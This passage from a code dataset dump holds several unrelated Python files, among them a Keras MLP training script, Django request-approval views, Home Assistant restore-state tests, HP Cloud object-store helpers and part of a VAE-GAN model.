(Demo)"} {"ext": "py", "sha": "1a2fad3f3ec070c73e65b6b03c43e2f696851309", "content": "# TIPS: only used to find the best epoch of MLP\n\n# MLP\nimport csv\nfrom itertools import islice\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import KFold, train_test_split\nimport pandas as pd\nfrom sklearn.utils import shuffle\n\nimport tensorflow as tf\n\n\ndef bit2attr(bitstr) -> list:\n attr_vec = list()\n for i in range(len(bitstr)):\n attr_vec.append(int(bitstr[i]))\n return attr_vec\n\ndef mean_relative_error(y_pred, y_test):\n assert len(y_pred) == len(y_test)\n mre = 0.0\n for i in range(len(y_pred)):\n mre = mre + abs((y_pred[i] - y_test[i]) / y_test[i])\n mre = mre * 100/ len(y_pred)\n return mre\n\nLarge_MRE_points = pd.DataFrame()\nLarge_MRE_X = []\nLarge_MRE_y_test = []\nLarge_MRE_y_pred = []\nLarge_MRE = []\n\n'''\n1) 数据预处理\n'''\n# filepath = 'data/fp/sjn/R+B+Cmorgan_fp1202.csv'\nfilepath = 'data/database/22-01-29-descriptor-train.csv'\n\ndata = pd.read_csv(filepath, encoding='gb18030')\nprint(data.shape)\ndata = data.dropna()\n\nprint(data.shape)\ndata = shuffle(data)\n\ndata_x_df = data.drop(['label'], axis=1)\ndata_y_df = data[['label']]\n\n# 归一化\nmin_max_scaler_X = MinMaxScaler()\nmin_max_scaler_X.fit(data_x_df)\nx_trans1 = min_max_scaler_X.transform(data_x_df)\n\nmin_max_scaler_y = MinMaxScaler()\nmin_max_scaler_y.fit(data_y_df)\ny_trans1 = min_max_scaler_y.transform(data_y_df)\n\ntest_filepath = \"data/database/22-01-29-descriptor-test-level-1.csv\"\ntest_data = pd.read_csv(test_filepath, encoding='gb18030')\nprint('test data: ', test_data.shape)\n\ntest_data_x_df = test_data.drop(['label'], axis=1)\ntest_data_y_df = test_data[['label']]\nx_trans1_test = min_max_scaler_X.transform(test_data_x_df)\ny_trans1_test = min_max_scaler_y.transform(test_data_y_df)\n\n'''\n3) 构建模型\n'''\n\nfrom keras.layers import MaxPooling1D, Conv1D, Dense, Flatten, Dropout\nfrom keras import models\nfrom keras.optimizers import Adam, RMSprop, SGD\n\ndef buildModel():\n model = models.Sequential()\n\n l4 = Dense(512, activation='relu')\n l5 = Dropout(rate=0.2)\n l6 = Dense(128, activation='relu')\n l7 = Dense(30, activation='relu')\n l8 = Dense(1)\n\n layers = [l4, l5, l6, l7, l8]\n for 
i in range(len(layers)):\n model.add(layers[i])\n\n adam = Adam(lr=1e-3)\n model.compile(optimizer=adam, loss='logcosh', metrics=['mae', 'mape'])\n\n model_mlp = MLPRegressor(\n hidden_layer_sizes=(512, 128, 32), activation='relu', solver='lbfgs', alpha=0.0001,\n max_iter=5000,\n random_state=1, tol=0.0001, verbose=False, warm_start=False)\n\n return model\n\ndef scheduler(epoch, lr):\n if epoch > 0 and epoch % 500 == 0:\n return lr * 0.1\n else:\n return lr\n\n'''\n4) 训练模型\n'''\nfrom sklearn import metrics\n\n# n_split = 10\nmlp_scores = []\nMAEs = []\nout_MAEs = []\n\nin_y_test = []\nin_y_pred = []\nout_y_test = []\nout_y_pred = []\n\nX_train = x_trans1\ny_train = y_trans1\n\n# 外部验证\nX_test = x_trans1_test\n\ny_trans1_test = np.reshape(y_trans1_test, (-1, 1))\ny_test = y_trans1_test\n\n\ncallback = tf.keras.callbacks.LearningRateScheduler(scheduler, verbose=1)\nmodel_mlp = buildModel()\nhistory = model_mlp.fit(X_train, y_train, epochs=1, verbose=1, validation_data=(X_test, y_test), callbacks=[callback])\nprint(model_mlp.summary())\nexit(0)\n\nlosses = history.history['loss']\neval_mres = history.history['val_mape']\n\nfig, ax1 = plt.subplots()\nax2 = ax1.twinx()\nax1.plot([x for x in range(len(losses))], losses, 'b', label='loss')\nax1.set_ylabel('loss', color='b')\nax2.plot([x for x in range(len(eval_mres))], eval_mres, 'r', label='eval_mre')\nax2.set_ylabel('eval_mre', color='r')\nax1.set_xlabel('epochs')\nplt.title('Training of MLP')\nplt.savefig('pics/Training_of_MLP.png')\n\nimport os\noutdir = 'Out/losses_and_mres'\nos.makedirs(outdir, exist_ok=True)\nwith open(os.path.join(outdir, 'mlp_descriptor.txt'), 'w') as f:\n f.write('loss\\n')\n f.write(' '.join([str(x) for x in losses]))\n f.write('\\n')\n f.write('mres\\n')\n f.write(' '.join([str(x) for x in eval_mres]))"} {"ext": "py", "sha": "1a2fada21c09f8bf65d23747a1211aeb7930ea13", "content": "import logging\n\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\nfrom app.utility.utils import memcached\n\nimport app.utility.utils as utils\nimport app.db.counter as counter\n\nimport web\n\nQUESTIONS_PER_SITEMAP = 500\n\n\nclass Sitemap(db.Model):\n question_count = db.IntegerProperty(default = 0)\n question_keys = db.StringListProperty(default = []) \n content = db.TextProperty(default ='')\n archived = db.BooleanProperty(default = False)\n created = db.DateTimeProperty(auto_now_add = True)\n last_modified = db.DateTimeProperty(auto_now = True)\n \n @staticmethod\n def get_last_sitemap():\n entity = Sitemap.all().order('-created').get()\n if entity:\n if entity.question_count >= QUESTIONS_PER_SITEMAP:\n entity.content = unicode(web.render.sitemap_questions(entity.question_keys))\n entity.archived = True\n entity.put()\n entity = Sitemap()\n entity.put()\n else:\n entity = Sitemap()\n entity.put()\n return entity\n \n @staticmethod\n def update_last_sitemap(key):\n last_sitemap = Sitemap.get_last_sitemap()\n last_sitemap.question_count += 1\n last_sitemap.question_keys.insert(0, str(key))\n last_sitemap.put()\n \n \n @staticmethod\n def get_sitemaps():\n sitemaps = Sitemap.all().order('-created').fetch(500)\n return sitemaps\n \n @staticmethod\n @memcached('get_sitemap_by_id', 3600*24, lambda id : int(id) )\n def get_sitemap_by_id(id):\n entity = Sitemap.get_by_id(id)\n if entity:\n if entity.content:\n return entity.content\n else:\n return unicode(web.render.sitemap_questions(entity.question_keys))\n else:\n raise web.notfound()"} {"ext": "py", "sha": "1a2faefaf711c5ce913d8e0bc348eba0ebcc72e8", "content": 
"from django.shortcuts import render\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom .models import Form\nfrom .forms import ReqForm\nfrom .filters import FormFilter\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.shortcuts import redirect\n\ndef form(request):\n return render(request,'form.html')\ndef status(request):\n return render(request,'status.html')\ndef about(request):\n return render(request,'about.html')\ndef index(request):\n return render(request,'index.html')\ndef showformdata(request):\n if request.method=='POST':\n fm=ReqForm(request.POST)\n if fm.is_valid():\n em=fm.cleaned_data['email']\n cn=fm.cleaned_data['ClubName']\n rn=fm.cleaned_data['RepresentativeName']\n cn=fm.cleaned_data['Contact']\n df=fm.cleaned_data['req_date_from']\n dt=fm.cleaned_data['req_date_to']\n rt=fm.cleaned_data['req_type']\n rp=fm.cleaned_data['req_purpose']\n profile = fm.save(commit=False)\n profile.user = request.user\n profile.save()\n fm.save() \n fm=ReqForm() \n print(em) \n print(rn) \n else:\n fm=ReqForm()\n return render(request,'form.html',{'frm':fm})\n \ndef reqInfo(request):\n u=request.user\n if u.groups.filter(name='Managers').exists():\n req = Form.objects.all()\n print(req)\n print(\"this is a manager\")\n context={\n 'form':form,\n 'req': req\n }\n else:\n req = Form.objects.filter(user=request.user)\n print(req)\n print(\"normal user\")\n context={\n 'form':form,\n 'req': req\n }\n return render(request,'status.html',context)\n\ndef student_approve(request,user_id):\n val=Form.objects.get(id=user_id)\n val.alloted=1\n val.save()\n return HttpResponse(\"approved successfully\")\n\ndef student_disapprove(request,user_id):\n val=Form.objects.get(id=user_id)\n val.alloted=2\n val.save()\n return HttpResponse(\"disapproved successfully\")\n\ndef student_reset(request,user_id):\n val=Form.objects.get(id=user_id)\n val.alloted=0\n val.save()\n return HttpResponse(\"reset successfully\")\n# def write_view(request, *args, **kwargs):\n# val=Form.objects.get(id=user_id)\n# if request.is_ajax() and request.method == \"POST\":\n# texteditor = request.POST['TextEntered']\n# val.Management_Comments='texteditor'\n# print(texteditor)\n# ## Don't forget to do validation and cleanup on texteditor to avoid security hassles \n# ## Do your logic here\n# SuccessAcknowledgment = {\"Acknowledged\":\"Acknowledged\"}\n# return HttpResponse(json.dumps(SuccessAcknowledgment))\n# else:\n# return render(request, \"write.html\")\ndef reqInfoMess(request):\n u=request.user\n if u.groups.filter(name='Managers').exists():\n req = Form.objects.all()\n print(req)\n print(\"this is a manager\")\n context={\n 'form':form,\n 'req': req\n }\n else:\n req = Form.objects.filter(user=request.user)\n print(req)\n print(\"normal user\")\n context={\n 'form':form,\n 'req': req\n }\n return render(request,'status.html',context)\n\ndef showmess(request, user_id):\n u=request.user\n if request.method=='POST':\n fm=mess(request.POST)\n ms=\"\"\n if fm.is_valid():\n ms=fm.cleaned_data['Management_Comments']\n u = fm.save(commit=False)\n #profile.user = request.user\n u.save()\n fm.save() \n fm=mess() \n print(ms) \n return render(request,'status.html',{'mess':ms})\n"} {"ext": "py", "sha": "1a2faf341daa8b57f34a09cec3003b1557907096", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# License: BSD-3 (https://tldrlegal.com/license/bsd-3-clause-license-(revised))\n# Copyright (c) 2016-2021, Cabral, Juan; Luczywo, Nadia\n# All rights 
reserved.\n\n# =============================================================================\n# DOCS\n# =============================================================================\n\n\"\"\"Tool to check if each python module has a corresponding API docs.\"\"\"\n\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\nimport inspect\nimport pathlib\n\nimport attr\n\nimport typer\n\n# =============================================================================\n# CONSTANTS\n# =============================================================================\n\nVERSION = \"0.1\"\n\n# =============================================================================\n# FUNCTIONS\n# =============================================================================\n\n\ndef check_apidoc_structure(apidoc_dir, reference_dir):\n\n apidoc_dir = pathlib.Path(apidoc_dir)\n reference_dir = pathlib.Path(reference_dir)\n\n if not apidoc_dir.exists():\n raise OSError(f\"'{apidoc_dir}' do no exist\")\n if not reference_dir.exists():\n raise OSError(f\"'{reference_dir}' do no exist\")\n\n reference = list(reference_dir.glob(\"**/*.py\"))\n\n result = {}\n for ref in reference:\n\n # essentially we remove the parent dir\n *dirs, ref_name = ref.relative_to(reference_dir).parts\n\n if ref_name == \"__init__.py\":\n ref_name = \"index.py\"\n\n search_dir = apidoc_dir\n for subdir in dirs:\n search_dir /= subdir\n\n search = search_dir / f\"{ref_name[:-3]}.rst\"\n\n result[str(ref)] = (str(search), search.exists())\n\n return result\n\n\n# =============================================================================\n# CLI\n# =============================================================================\n\n\n@attr.s(frozen=True)\nclass CLI:\n \"\"\"Check if the structure of API doc directory is equivalent to those of\n the project.\n\n \"\"\"\n\n footnotes = \"\\n\".join(\n [\n \"This software is under the BSD 3-Clause License.\",\n \"Copyright (c) 2021, Juan Cabral.\",\n \"For bug reporting or other instructions please check:\"\n \" https://github.com/quatrope/scikit-criteria\",\n ]\n )\n\n run = attr.ib(init=False)\n\n @run.default\n def _set_run_default(self):\n app = typer.Typer()\n for k in dir(self):\n if k.startswith(\"_\"):\n continue\n v = getattr(self, k)\n if inspect.ismethod(v):\n decorator = app.command()\n decorator(v)\n return app\n\n def version(self):\n \"\"\"Print checktestdir.py version.\"\"\"\n typer.echo(f\"{__file__ } v.{VERSION}\")\n\n def check(\n self,\n test_dir: str = typer.Argument(\n ..., help=\"Path to the api-doc structure.\"\n ),\n reference_dir: str = typer.Option(\n ..., help=\"Path to the reference structure.\"\n ),\n verbose: bool = typer.Option(\n default=False, help=\"Show all the result\"\n ),\n ):\n \"\"\"Check if the structure of test directory is equivalent to those\n of the project.\n\n \"\"\"\n try:\n check_result = check_apidoc_structure(test_dir, reference_dir)\n except Exception as err:\n typer.echo(typer.style(str(err), fg=typer.colors.RED))\n raise typer.Exit(code=1)\n\n all_tests_exists = True\n for ref, test_result in check_result.items():\n\n test, test_exists = test_result\n\n if test_exists:\n fg = typer.colors.GREEN\n status = \"\"\n else:\n all_tests_exists = False\n fg = typer.colors.RED\n status = typer.style(\"[NOT FOUND]\", fg=typer.colors.YELLOW)\n\n if verbose or not test_exists:\n msg = f\"{ref} -> {test} {status}\"\n typer.echo(typer.style(msg, 
fg=fg))\n\n if all_tests_exists:\n final_fg = typer.colors.GREEN\n final_status = \"Test structure ok!\"\n exit_code = 0\n else:\n final_fg = typer.colors.RED\n final_status = \"Structure not equivalent!\"\n exit_code = 1\n\n typer.echo(\"-------------------------------------\")\n typer.echo(typer.style(final_status, fg=final_fg))\n raise typer.Exit(code=exit_code)\n\n\ndef main():\n \"\"\"Run the checkapidocdir.py cli interface.\"\"\"\n cli = CLI()\n cli.run()\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2fb1887626cf76c536e2f273cf98f4340ebff5", "content": "# Licensed to the Apache Software Foundation (ASF) under one\r\n# or more contributor license agreements. See the NOTICE file\r\n# distributed with this work for additional information\r\n# regarding copyright ownership. The ASF licenses this file\r\n# to you under the Apache License, Version 2.0 (the\r\n# \"License\"); you may not use this file except in compliance\r\n# with the License. You may obtain a copy of the License at\r\n#\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n#\r\n# Unless required by applicable law or agreed to in writing,\r\n# software distributed under the License is distributed on an\r\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n# KIND, either express or implied. See the License for the\r\n# specific language governing permissions and limitations\r\n# under the License.\r\n\r\nfrom aliyunsdkcore.request import RpcRequest\nfrom aliyunsdkemr.endpoint import endpoint_data\r\n\r\nclass ListRequiredServiceRequest(RpcRequest):\r\n\r\n\tdef __init__(self):\r\n\t\tRpcRequest.__init__(self, 'Emr', '2016-04-08', 'ListRequiredService','emr')\r\n\t\tif hasattr(self, \"endpoint_map\"):\r\n\t\t\tsetattr(self, \"endpoint_map\", endpoint_data.getEndpointMap())\r\n\t\tif hasattr(self, \"endpoint_regional\"):\r\n\t\t\tsetattr(self, \"endpoint_regional\", endpoint_data.getEndpointRegional())\r\n\r\n\r\n\tdef get_ResourceOwnerId(self):\r\n\t\treturn self.get_query_params().get('ResourceOwnerId')\r\n\r\n\tdef set_ResourceOwnerId(self,ResourceOwnerId):\r\n\t\tself.add_query_param('ResourceOwnerId',ResourceOwnerId)\r\n\r\n\tdef get_EmrVersion(self):\r\n\t\treturn self.get_query_params().get('EmrVersion')\r\n\r\n\tdef set_EmrVersion(self,EmrVersion):\r\n\t\tself.add_query_param('EmrVersion',EmrVersion)\r\n\r\n\tdef get_ServiceNameList(self):\r\n\t\treturn self.get_query_params().get('ServiceNameList')\r\n\r\n\tdef set_ServiceNameList(self,ServiceNameList):\r\n\t\tself.add_query_param('ServiceNameList',ServiceNameList)"} {"ext": "py", "sha": "1a2fb2f57b569902970daef785ec480eca5e29b4", "content": "\"\"\"The tests for the Restore component.\"\"\"\nfrom datetime import datetime\nfrom unittest.mock import patch\n\nfrom homeassistant.const import EVENT_HOMEASSISTANT_START\nfrom homeassistant.core import CoreState, State\nfrom homeassistant.exceptions import HomeAssistantError\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.helpers.restore_state import (\n DATA_RESTORE_STATE_TASK,\n STORAGE_KEY,\n RestoreEntity,\n RestoreStateData,\n StoredState,\n)\nfrom homeassistant.util import dt as dt_util\n\n\nasync def test_caching_data(hass):\n \"\"\"Test that we cache data.\"\"\"\n now = dt_util.utcnow()\n stored_states = [\n StoredState(State(\"input_boolean.b0\", \"on\"), now),\n StoredState(State(\"input_boolean.b1\", \"on\"), now),\n StoredState(State(\"input_boolean.b2\", \"on\"), now),\n ]\n\n data = await RestoreStateData.async_get_instance(hass)\n await 
hass.async_block_till_done()\n await data.store.async_save([state.as_dict() for state in stored_states])\n\n # Emulate a fresh load\n hass.data[DATA_RESTORE_STATE_TASK] = None\n\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n\n # Mock that only b1 is present this run\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data:\n state = await entity.async_get_last_state()\n await hass.async_block_till_done()\n\n assert state is not None\n assert state.entity_id == \"input_boolean.b1\"\n assert state.state == \"on\"\n\n assert mock_write_data.called\n\n\nasync def test_hass_starting(hass):\n \"\"\"Test that we cache data.\"\"\"\n hass.state = CoreState.starting\n\n now = dt_util.utcnow()\n stored_states = [\n StoredState(State(\"input_boolean.b0\", \"on\"), now),\n StoredState(State(\"input_boolean.b1\", \"on\"), now),\n StoredState(State(\"input_boolean.b2\", \"on\"), now),\n ]\n\n data = await RestoreStateData.async_get_instance(hass)\n await hass.async_block_till_done()\n await data.store.async_save([state.as_dict() for state in stored_states])\n\n # Emulate a fresh load\n hass.data[DATA_RESTORE_STATE_TASK] = None\n\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n\n # Mock that only b1 is present this run\n states = [State(\"input_boolean.b1\", \"on\")]\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data, patch.object(hass.states, \"async_all\", return_value=states):\n state = await entity.async_get_last_state()\n await hass.async_block_till_done()\n\n assert state is not None\n assert state.entity_id == \"input_boolean.b1\"\n assert state.state == \"on\"\n\n # Assert that no data was written yet, since hass is still starting.\n assert not mock_write_data.called\n\n # Finish hass startup\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data:\n hass.bus.async_fire(EVENT_HOMEASSISTANT_START)\n await hass.async_block_till_done()\n\n # Assert that this session states were written\n assert mock_write_data.called\n\n\nasync def test_dump_data(hass):\n \"\"\"Test that we cache data.\"\"\"\n states = [\n State(\"input_boolean.b0\", \"on\"),\n State(\"input_boolean.b1\", \"on\"),\n State(\"input_boolean.b2\", \"on\"),\n State(\"input_boolean.b5\", \"unavailable\", {\"restored\": True}),\n ]\n\n entity = Entity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b0\"\n await entity.async_internal_added_to_hass()\n\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n await entity.async_internal_added_to_hass()\n\n data = await RestoreStateData.async_get_instance(hass)\n now = dt_util.utcnow()\n data.last_states = {\n \"input_boolean.b0\": StoredState(State(\"input_boolean.b0\", \"off\"), now),\n \"input_boolean.b1\": StoredState(State(\"input_boolean.b1\", \"off\"), now),\n \"input_boolean.b2\": StoredState(State(\"input_boolean.b2\", \"off\"), now),\n \"input_boolean.b3\": StoredState(State(\"input_boolean.b3\", \"off\"), now),\n \"input_boolean.b4\": StoredState(\n State(\"input_boolean.b4\", \"off\"),\n datetime(1985, 10, 26, 1, 22, tzinfo=dt_util.UTC),\n ),\n \"input_boolean.b5\": StoredState(State(\"input_boolean.b5\", \"off\"), now),\n }\n\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data, patch.object(hass.states, \"async_all\", return_value=states):\n await data.async_dump_states()\n\n assert 
mock_write_data.called\n args = mock_write_data.mock_calls[0][1]\n written_states = args[0]\n\n # b0 should not be written, since it didn't extend RestoreEntity\n # b1 should be written, since it is present in the current run\n # b2 should not be written, since it is not registered with the helper\n # b3 should be written, since it is still not expired\n # b4 should not be written, since it is now expired\n # b5 should be written, since current state is restored by entity registry\n assert len(written_states) == 3\n assert written_states[0][\"state\"][\"entity_id\"] == \"input_boolean.b1\"\n assert written_states[0][\"state\"][\"state\"] == \"on\"\n assert written_states[1][\"state\"][\"entity_id\"] == \"input_boolean.b3\"\n assert written_states[1][\"state\"][\"state\"] == \"off\"\n assert written_states[2][\"state\"][\"entity_id\"] == \"input_boolean.b5\"\n assert written_states[2][\"state\"][\"state\"] == \"off\"\n\n # Test that removed entities are not persisted\n await entity.async_remove()\n\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data, patch.object(hass.states, \"async_all\", return_value=states):\n await data.async_dump_states()\n\n assert mock_write_data.called\n args = mock_write_data.mock_calls[0][1]\n written_states = args[0]\n assert len(written_states) == 2\n assert written_states[0][\"state\"][\"entity_id\"] == \"input_boolean.b3\"\n assert written_states[0][\"state\"][\"state\"] == \"off\"\n assert written_states[1][\"state\"][\"entity_id\"] == \"input_boolean.b5\"\n assert written_states[1][\"state\"][\"state\"] == \"off\"\n\n\nasync def test_dump_error(hass):\n \"\"\"Test that we cache data.\"\"\"\n states = [\n State(\"input_boolean.b0\", \"on\"),\n State(\"input_boolean.b1\", \"on\"),\n State(\"input_boolean.b2\", \"on\"),\n ]\n\n entity = Entity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b0\"\n await entity.async_internal_added_to_hass()\n\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n await entity.async_internal_added_to_hass()\n\n data = await RestoreStateData.async_get_instance(hass)\n\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\",\n side_effect=HomeAssistantError,\n ) as mock_write_data, patch.object(hass.states, \"async_all\", return_value=states):\n await data.async_dump_states()\n\n assert mock_write_data.called\n\n\nasync def test_load_error(hass):\n \"\"\"Test that we cache data.\"\"\"\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n\n with patch(\n \"homeassistant.helpers.storage.Store.async_load\",\n side_effect=HomeAssistantError,\n ):\n state = await entity.async_get_last_state()\n\n assert state is None\n\n\nasync def test_state_saved_on_remove(hass):\n \"\"\"Test that we save entity state on removal.\"\"\"\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b0\"\n await entity.async_internal_added_to_hass()\n\n now = dt_util.utcnow()\n hass.states.async_set(\n \"input_boolean.b0\", \"on\", {\"complicated\": {\"value\": {1, 2, now}}}\n )\n\n data = await RestoreStateData.async_get_instance(hass)\n\n # No last states should currently be saved\n assert not data.last_states\n\n await entity.async_remove()\n\n # We should store the input boolean state when it is removed\n state = data.last_states[\"input_boolean.b0\"].state\n assert state.state == \"on\"\n assert isinstance(state.attributes[\"complicated\"][\"value\"], list)\n assert 
set(state.attributes[\"complicated\"][\"value\"]) == {1, 2, now.isoformat()}\n\n\nasync def test_restoring_invalid_entity_id(hass, hass_storage):\n \"\"\"Test restoring invalid entity IDs.\"\"\"\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"test.invalid__entity_id\"\n now = dt_util.utcnow().isoformat()\n hass_storage[STORAGE_KEY] = {\n \"version\": 1,\n \"key\": STORAGE_KEY,\n \"data\": [\n {\n \"state\": {\n \"entity_id\": \"test.invalid__entity_id\",\n \"state\": \"off\",\n \"attributes\": {},\n \"last_changed\": now,\n \"last_updated\": now,\n \"context\": {\n \"id\": \"3c2243ff5f30447eb12e7348cfd5b8ff\",\n \"user_id\": None,\n },\n },\n \"last_seen\": dt_util.utcnow().isoformat(),\n }\n ],\n }\n\n state = await entity.async_get_last_state()\n assert state is None\n"} {"ext": "py", "sha": "1a2fb3864acac51c2808eb3aa0e7ffbcde0d3200", "content": "\"\"\"Implement a query class.\"\"\"\nfrom dataclasses import dataclass\nfrom typing import List, Container\nfrom .keyword import Keyword\nfrom .first_class_collection import FirstClassSequence\n\n\n@dataclass\nclass Query(FirstClassSequence):\n \"\"\"Represent a query.\"\"\"\n\n keywords: List[Keyword]\n\n @property\n def sequence(self):\n \"\"\"Return :py:attr:`keywords`.\"\"\"\n return self.keywords\n\n def get_query_filtered_by_container(self, container: Container[str]):\n \"\"\"Filter by a container.\n\n Returns\n -------\n Query\n\n \"\"\"\n return Query([keyword for keyword in self.keywords\n if keyword.keyword in container])\n"} {"ext": "py", "sha": "1a2fb470ba622f19ebdc5d1aa4ba2b377e0a971f", "content": "import hmac\nfrom hashlib import sha1\nfrom time import time\nimport urllib2\nimport simplejson\n\nfrom django.conf import settings\nfrom django_hpcloud.models import AuthToken\n\ndef generate_form_post_key(path, redirect,\n expires=2147483647,\n max_file_size=1073741824,\n method='POST'):\n '''\n Generates the key for the FormPOST signatures. 
This is used for the file\n upload forms.\n\n :param path: :class:`str` The path of the directory to upload to, this should\n not include the name of the file you're uploading.\n :param expires: :class:`int` The Unix timestamp of the expiry date of the form.\n :param max_file_size: :class:`int` The maximum file size of the files allowed\n to be uploaded with this form.\n :param method: :class:`str` The method which the form will be using, defaults to\n POST because that's all that's supported but allows\n others just in case.\n '''\n path = \"/v1/%s/%s/\" % (settings.TENANT_ID, path)\n hmac_body = \"%s\\n%s\\n%s\\n%s\\n%s\" % (\n path, redirect, max_file_size, \"10\", expires,\n )\n return \"%s:%s:%s\" % (\n settings.TENANT_ID, settings.HP_ACCESS_KEY,\n hmac.new(settings.HP_SECRET_KEY, hmac_body, sha1).hexdigest()\n )\n\ndef generate_share_url(path, expires=2147483647):\n '''\n Generates the URL for which you can create a time-sensitive link to any item\n in your object store.\n\n :param expires: :class:`int` The Unix timestamp of the expiry date of the form.\n '''\n hmac_path = \"/v1/%s/%s\" % (settings.TENANT_ID, path)\n hmac_body = \"%s\\n%s\\n%s\" % (\"GET\",expires, hmac_path)\n hmac_code = \"%s:%s:%s\" % (\n settings.TENANT_ID, settings.HP_ACCESS_KEY,\n hmac.new(settings.HP_SECRET_KEY, hmac_body, sha1).hexdigest()\n )\n path = \"%s%s/%s?temp_url_sig=%s&temp_url_expires=%s\" % (\n settings.OBJECT_STORE_URL, settings.TENANT_ID, path,\n hmac_code, expires)\n return path\n\ndef get_object_list(container):\n '''Returns a list of objects inside a container.\n\n :param container: :class:`str` The name of the container to list.\n '''\n container = \"%s%s/%s?format=json\" % (settings.OBJECT_STORE_URL, settings.TENANT_ID, container)\n req = urllib2.Request(container)\n req.add_header(\"Content-type\", \"application/json\")\n req.add_header(\"X-Auth-Token\", get_auth_token())\n response = urllib2.urlopen(req)\n return simplejson.loads(response.read())\n\ndef get_auth_token():\n '''Returns the auth_token currently being used.\n\n If the auth_token has expired, it will generate a new one and return that.\n '''\n if AuthToken.objects.all().count() > 0:\n token = AuthToken.objects.all()[0]\n if token.is_valid():\n return token.token\n AuthToken.objects.all().delete()\n json_data = {\n \"auth\": {\n \"passwordCredentials\": {\n \"username\": settings.HPCLOUD_USERNAME,\n \"password\": settings.HPCLOUD_PASSWORD\n },\n \"tenantId\": settings.TENANT_ID\n }\n }\n payload = simplejson.dumps(json_data)\n req = urllib2.Request(\n settings.REGION_URL + \"tokens\",\n )\n req.add_header(\"Content-type\", \"application/json\")\n json = simplejson.loads(urllib2.urlopen(req, payload).read())\n AuthToken(token=json['access']['token']['id'],\n expires=json['access']['token']['expires']).save()\n return json['access']['token']['id']\n"} {"ext": "py", "sha": "1a2fb594f98416859fabd33085c931d2e5be1adb", "content": "import numpy as np\n\nimport tensorflow as tf\n\nfrom tensorflow.keras.layers import Input, Conv2D, Flatten, Dense, Conv2DTranspose, Lambda, Reshape, Layer\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import backend as K\n\nINPUT_DIM = (64,64,3)\n\nCONV_FILTERS = [32,64,64, 128]\nCONV_KERNEL_SIZES = [4,4,4,4]\nCONV_STRIDES = [2,2,2,2]\nCONV_ACTIVATIONS = ['relu','relu','relu','relu']\n\nDENSE_SIZE = 1024\n\nCONV_T_FILTERS = [64,64,32,3]\nCONV_T_KERNEL_SIZES = [5,5,6,6]\nCONV_T_STRIDES = [2,2,2,2]\nCONV_T_ACTIVATIONS = 
['relu','relu','relu','sigmoid']\n\nZ_DIM = 32\n\nBATCH_SIZE = 100\nLEARNING_RATE = 0.0001\nKL_TOLERANCE = 0.5\n\n\n\n\nclass Sampling(Layer):\n def call(self, inputs):\n mu, log_var = inputs\n epsilon = K.random_normal(shape=K.shape(mu), mean=0., stddev=1.)\n return mu + K.exp(log_var / 2) * epsilon\n\n\nclass VAEModel(Model):\n def __init__(self, encoder, decoder, r_loss_factor, **kwargs):\n super(VAEModel, self).__init__(**kwargs)\n self.encoder = encoder\n self.decoder = decoder\n self.r_loss_factor = r_loss_factor\n\n def train_step(self, data):\n if isinstance(data, tuple):\n data = data[0]\n with tf.GradientTape() as tape:\n z_mean, z_log_var, z = self.encoder(data)\n reconstruction = self.decoder(z)\n reconstruction_loss = tf.reduce_mean(\n tf.square(data - reconstruction), axis = [1,2,3]\n )\n reconstruction_loss *= self.r_loss_factor\n kl_loss = 1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var)\n kl_loss = tf.reduce_sum(kl_loss, axis = 1)\n kl_loss *= -0.5\n total_loss = reconstruction_loss + kl_loss\n grads = tape.gradient(total_loss, self.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n return {\n \"loss\": total_loss,\n \"reconstruction_loss\": reconstruction_loss,\n \"kl_loss\": kl_loss,\n }\n \n def call(self,inputs):\n latent = self.encoder(inputs)\n return self.decoder(latent)\n\nclass VAEGAN(tf.keras.Model):\n \"\"\"a VAEGAN class for tensorflow\n \n Extends:\n tf.keras.Model\n \"\"\"\n\n def __init__(self, **kwargs):\n super(VAEGAN, self).__init__()\n self.__dict__.update(kwargs)\n\n self.enc = tf.keras.Sequential(self.enc)\n self.dec = tf.keras.Sequential(self.dec)\n inputs, disc_l, outputs = self.vae_disc_function()\n self.disc = tf.keras.Model(inputs=[inputs], outputs=[outputs, disc_l])\n\n self.enc_optimizer = tf.keras.optimizers.Adam(self.lr_base_gen, beta_1=0.5)\n self.dec_optimizer = tf.keras.optimizers.Adam(self.lr_base_gen, beta_1=0.5)\n self.disc_optimizer = tf.keras.optimizers.Adam(self.get_lr_d, beta_1=0.5)\n\n def encode(self, x):\n mu, sigma = tf.split(self.enc(x), num_or_size_splits=2, axis=1)\n return mu, sigma\n\n def dist_encode(self, x):\n mu, sigma = 